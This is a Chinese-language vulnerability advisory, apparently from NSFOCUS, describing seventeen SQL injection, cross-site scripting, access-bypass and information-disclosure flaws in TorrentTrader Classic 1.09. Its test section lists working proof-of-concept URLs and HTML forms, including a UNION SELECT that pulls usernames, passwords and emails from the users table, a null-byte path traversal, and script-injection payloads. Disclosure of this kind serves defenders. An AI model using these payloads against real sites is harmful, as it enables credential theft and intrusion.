安全研究
安全漏洞
TorrentTrader Classic多个远程安全漏洞
发布日期:2009-06-15
更新日期:2009-06-18
受影响系统:
TorrentTrader.org TorrentTrader Classic 1.09描述:
BUGTRAQ ID: 35369
CVE(CAN) ID: CVE-2009-2156,CVE-2009-2157,CVE-2009-2158,CVE-2009-2159,CVE-2009-2160,CVE-2009-2161
TorrentTrader是用PHP编写的torrent tracker平台。
TorrentTrader Classic中存在多个远程安全漏洞,恶意用户可以利用这些漏洞执行脚本注入、SQL注入、绕过安全限制、窃取敏感信息等多种攻击。
1) 在删除消息时account-inbox.php中没有正确地过滤对origmsg参数的输入,可能导致SQL注入攻击。成功利用这个漏洞需要有效的用户凭据。
2) 没有正确地限制对backup-database.php脚本的访问。此外,该脚本在公开可访问的文件夹中创建了带有易猜测文件名的数据库dump。
3) browse.php文件中没有正确地过滤对wherecatin参数的输入,可能导致SQL注入攻击。
4) 没有正确地限制对check.php和phpinfo.php脚本的访问,可能导致泄漏某些系统信息,如系统路径、PHP设置、文件权限设置等。
5) delreq.php文件中没有正确地过滤对categ参数的输入,可能导致SQL注入攻击。成功利用这个漏洞要求拥有删除请求权限。
6) index.php文件中没有正确地过滤对参数的输入,可能导致SQL注入攻击。成功利用这个漏洞要求拥有有效的用户凭据。
7) 如果将act设置为edit的话,modrules.php文件中没有正确地过滤对id参数的输入,可能导致SQL注入攻击。成功利用这个漏洞要求拥有moderator权限。
8) report.php文件中没有正确地过滤对user、torrent、forumid和forumpost POST的输入,可能导致SQL注入攻击。成功利用这个漏洞需要有效的用户凭据。
9) takedelreport.php文件中没有正确地过滤对delreport[]参数的输入,可能导致SQL注入攻击。成功利用这个漏洞要求拥有moderator权限。
10) takedelreq.php文件中没有正确地过滤对delreq[]参数的输入,可能导致SQL注入攻击。成功利用这个漏洞需要有效的用户凭据。
11) takewarndisable.php文件中没有正确地过滤对warndisable[]参数的输入,可能导致SQL注入攻击。成功利用这个漏洞要求拥有moderator权限。
12) today.php文件中没有正确地过滤对limit参数的输入,可能导致SQL注入攻击。
13) torrents-details.php文件中没有正确地过滤对where参数的输入,可能导致SQL注入攻击。
14) admin-delreq.php文件中没有正确地过滤对categ参数的输入,可能导致SQL注入攻击。成功利用这个漏洞要求拥有moderator权限。
15) 在请求torrent时没有正确地过滤对Title字段的输入,上传torrent时没有正确的过滤Torrent Name字段,可能导致注入任意HTML和脚本代码。成功利用这个漏洞需要有效的用户权限。
16) 由于没有正确地限制对backend/admin-functions.php脚本的访问,在不区分大小写的文件系统上可能导致绕过访问限制。
17) themes/default/footer.php文件中没有争取的过滤对ttversion参数的输入,themes/default/header.php文件中没有正确的过滤对SITENAME和CURUSER参数的输入,visitorstoday.php文件中没有正确的过滤对todayactive参数的输入,visitorsnow.php文件中没有正确的过滤对activepeople参数的输入,faq.php文件中没有正确的过滤对faq_categ[][title]参数的输入,可能导致在用户浏览器会话中执行任意HTML和脚本代码。
<*来源:Janek Vind (come2waraxe@yahoo.com)
链接:http://secunia.com/advisories/35456/
http://marc.info/?l=bugtraq&m=124508292705828&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/torrenttrader109/account-inbox.php?msg=1&receiver=waraxe&origmsg=foobar&delete=yes
http://www.example.com/torrenttrader109/browse.php?wherecatin=waraxe
http://www.example.com/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,1,2)=(SELECT+1
http://www.example.com/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,1,2)=(SELECT+1
http://www.example.com/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1
http://www.example.com/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1
http://www.example.com/torrenttrader109/delreq.php?categ=waraxe
http://www.example.com/torrenttrader109/delreq.php?categ=UNION+ALL+SELECT+1,2,3,4,5,username,password,email+FROM+users--+
-------------------------------------------------------------------------------
<html><body><center>
<form action="http://localhost/torrenttrader109/index.php" method="post">
<input type="hidden" name="choice" value="waraxe">
<input type="submit" value="Test!">
</form></center></body></html>
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
<html><body><center>
<form action="http://localhost/torrenttrader109/modrules.php?act=edited"method="post"> <input type="hidden" name="title" value="test">
<input type="hidden" name="text" value="test">
<input type="hidden" name="public" value="yes">
<input type="hidden" name="class" value="0">
<input type="hidden" name="id" value="1">
<input type="submit" value="Test!">
</form></center></body></html>
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
<html><body><center>
<form action="http://localhost/torrenttrader109/report.php" method="post">
<input type="hidden" name="reason" value="test">
<input type="hidden" name="user" value="0 UNION SELECT IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),1)-- "> <input type="submit" value="Test!">
</form></center></body></html>
-------------------------------------------------------------------------------
-----------------------------[source code start]-------------------------------
<html><body><center>
<form action="http://localhost/torrenttrader109/report.php" method="post">
<input type="hidden" name="reason" value="test">
<input type="hidden" name="user" value="0 UNION SELECT IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),1)-- "> <input type="submit" value="Test!">
</form></center></body></html>
-----------------------------[source code end]---------------------------------
http://www.example.com/torrenttrader109/today.php?limit=waraxe
http://www.example.com/torrenttrader109/torrents-details.php?id=1&where=1=IF(LENGTH(@@version)>1,1,(SELECT+1+UNION+ALL+SELECT+1))--+
http://www.example.com/torrenttrader109/torrents-details.php?id=1&where=1=IF(LENGTH(@@version)>50,1,(SELECT+1+UNION+ALL+SELECT+1))--+
http://www.example.com/torrenttrader109/admin-delreq.php?categ=waraxe
http://www.example.com/torrenttrader109/backend/Admin-functions.php?ss_uri=../../banners.txt%00
http://www.example.com/torrenttrader109/themes/default/footer.php?ttversion=<script>alert(123);</script>
http://www.example.com/torrenttrader109/themes/default/header.php?SITENAME="><script>alert(123);</script>
http://www.example.com/torrenttrader109/themes/default/header.php?CURUSER[username]=<script>alert(123);</script>
http://www.example.com/torrenttrader109/visitorstoday.php?todayactive=<script>alert(123);</script>
http://www.example.com/torrenttrader109/visitorsnow.php?activepeople=<script>alert(123);</script>
http://www.example.com/torrenttrader109/faq.php?faq_categ[999][title]=<script>alert(123);</script>&faq_categ[999][flag]=1
http://www.example.com/torrenttrader109/torrents-details.php?id=1&keepget="><script>alert(123);</script>
建议:
厂商补丁:
TorrentTrader.org
-----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.torrenttrader.org/index.php?
浏览次数:2598
严重程度:0(网友投票)
绿盟科技给您安全的保障